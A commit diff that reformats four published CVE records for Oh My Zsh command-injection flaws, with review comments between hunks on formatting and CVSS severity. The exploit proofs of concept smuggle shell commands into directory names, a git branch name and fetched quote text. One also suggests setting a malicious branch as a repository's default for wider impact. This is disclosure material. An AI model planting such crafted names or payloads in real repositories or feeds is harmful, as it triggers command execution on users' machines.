"-Synchronized-Data."

CVE Team 2021-11-30 10:01:04 +00:00
parent f801885bb8
commit ed428eba4e
No known key found for this signature in database
GPG Key ID: 5708902F06FEF743
4 changed files with 279 additions and 279 deletions


@ -1,86 +1,86 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3725",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3725",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"06fc5fb"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "06fc5fb"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in dirhistory plugin\n\nDescription: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection.\n\nImpacted areas:\n\n- Functions pop_past and pop_future in dirhistory plugin."
}
]
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin."
}
]
},
"exploit": [
{
"lang": "eng",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory';id;echo 'pwned\"\n mkdir \"$baddir\" && cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ <Alt-Left>\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
{
"lang": "eng",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory';id;echo 'pwned\"\n mkdir \"$baddir\" && cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ <Alt-Left>\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
]
}
}
}
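Review bot: the rewritten `description_data[0].value` (the second `"value": "Vulnerability in dirhistory plugin ..."` line) drops every `\n` in the string, so the `Description:` label and the `Impacted areas:` list item `- Functions pop_past and pop_future in dirhistory plugin.` now run into one sentence, while the `exploit[0].value` a few lines below keeps its `\n` breaks; if the sync is meant to normalize whitespace it should treat both fields the same, and the safer fix is to keep the original `\n\n` separators so the description renders as written. Separately, the CVSS block carried over unchanged pairs `"baseScore": 7.5` with `"baseSeverity": "MEDIUM"`; 7.5 falls in the CVSS 3.1 High band (7.0 to 8.9), and the vector `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H` does compute to 7.5, so `baseSeverity` should read `"HIGH"`. The same score/severity pair is repeated in the other three records in this commit. Finally, `"version_affected": "<"` against `"version_value": "06fc5fb"` compares against a commit hash, which has no ordering; a tag or release date, or a note that all commits before 06fc5fb are affected, would make the affected range interpretable by tooling.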


@ -1,42 +1,42 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3726",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3726",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"a263cdac"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "a263cdac"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `title` function\n\n**Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe.\n\n**Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac).\n\n**Impacted areas**:\n\n- `title` function in `lib/termsupport.zsh`.\n- Custom user code using the `title` function."
"value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."
}
]
},
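Review bot: the new `value` line for the CVE-2021-3726 description collapses the Markdown that the old line carried (the `# Vulnerability in `title` function` heading, the `**Fixed in**` paragraph, and the two `- ` list items under `**Impacted areas**`) onto a single line by removing the `\n` sequences; a Markdown renderer will now treat the whole string as one heading line, and a plain-text consumer loses the list entirely. Keep the `\n\n` separators as in the old line, or convert the text to plain sentences if Markdown is not wanted in `description_data`.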
@ -46,41 +46,41 @@
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir='`echo pwned && id`'\n mkdir \"$baddir\" && cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n ![2 title_function poc](https://user-images.githubusercontent.com/1441704/142874935-341ddd3c-21e8-4b9e-a5c1-77c0b3debacc.png)"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
]
}
}
}
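Review bot: the exploit `value` in this hunk's leading context says "see screenshot" and links an image on user-images.githubusercontent.com as the only evidence of what `title "$PWD"` does with the sample directory name, while the other three records in this commit show the resulting terminal output as text; a short text transcript here would keep the record self-contained once the image link goes stale. The `impact` block is otherwise only reformatted and still pairs `"baseScore": 7.5` with `"baseSeverity": "MEDIUM"`, which does not match the CVSS 3.1 severity bands.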


@ -1,86 +1,86 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3727",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3727",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"72928432"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "72928432"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins\n\n**Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use.\n\n**Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432).\n\n**Impacted areas**:\n\n- `rand-quote` plugin (`quote` function).\n- `hitokoto` plugin (`hitokoto` function)."
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."
}
]
},
"exploit": [
{
"lang": "eng",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: “Whatever you fear most has no powerPWNED - it is your fear that has the power.”\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` 
part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"她拨弄琴弦,$(echo PWNED)扬起潮汐。\",\"type\":\"e\",\"from\":\"原创\",\"from_who\":\"我\",\"creator\":\"鸢尾\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n 原创: “她拨弄琴弦PWNED扬起潮汐。”\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the 
`$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/72928432",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
]
}
}
}
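Review bot: besides flattening the description's `\n` separators (the heading, `**Fixed in**`, and the two `- ` list items now share one line), the rewritten exploit `value` re-encodes every non-ASCII character as a `\uXXXX` escape (`\u201c` for the curly quote, `\u5979\u62e8...` for the hitokoto sample); the JSON is equivalent, but the raw file is now unreadable for the Chinese text and the diff touches content that did not actually change. If the sync tool only emits ASCII, consider keeping UTF-8 output for these records. One wording nit carried over unchanged in the description: "do some process on them" should read "do some processing on them".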


@ -1,86 +1,86 @@
{
"CVE_data_meta":{
"ASSIGNER":"security@huntr.dev",
"ID":"CVE-2021-3769",
"STATE":"PUBLIC",
"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3769",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects":{
"vendor":{
"vendor_data":[
{
"product":{
"product_data":[
{
"product_name":"ohmyzsh/ohmyzsh",
"version":{
"version_data":[
{
"version_affected":"<",
"version_value":"b3ba9978"
}
]
}
}
]
},
"vendor_name":"ohmyzsh"
}
]
}
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "<",
"version_value": "b3ba9978"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format":"MITRE",
"data_type":"CVE",
"data_version":"4.0",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes\n\n**Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited.\n\n**Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978).\n\n**Impacted areas**:\n\n- `pygmalion` theme.\n- `pygmalion-virtualenv` theme.\n- `refined` theme."
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
}
]
},
"exploit": [
{
"lang": "eng",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
}
],
"impact":{
"cvss":{
"attackComplexity":"HIGH",
"attackVector":"NETWORK",
"availabilityImpact":"HIGH",
"baseScore":7.5,
"baseSeverity":"MEDIUM",
"confidentialityImpact":"HIGH",
"integrityImpact":"HIGH",
"privilegesRequired":"NONE",
"scope":"UNCHANGED",
"userInteraction":"REQUIRED",
"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version":"3.1"
}
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype":{
"problemtype_data":[
{
"description":[
{
"lang":"eng",
"value":"CWE-78 OS Command Injection"
}
]
}
]
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references":{
"reference_data":[
{
"name":"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
"refsource":"MISC",
"url":"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
]
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
]
}
}
}
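Review bot: same flattening as the other records in this commit: the description loses its `\n\n` breaks so `# Vulnerability in ...`, `**Fixed in**`, and the three theme list items become one line, and the exploit's `⇒` prompt glyph becomes `\u21d2`. Two wording nits are carried over unchanged in the exploit text: "the prompt changes changes from the default branch" doubles "changes", and the sample prompt shows `~/exploit-poc` while step 3 creates `bad-repo`, so the transcript and the steps disagree on the directory name.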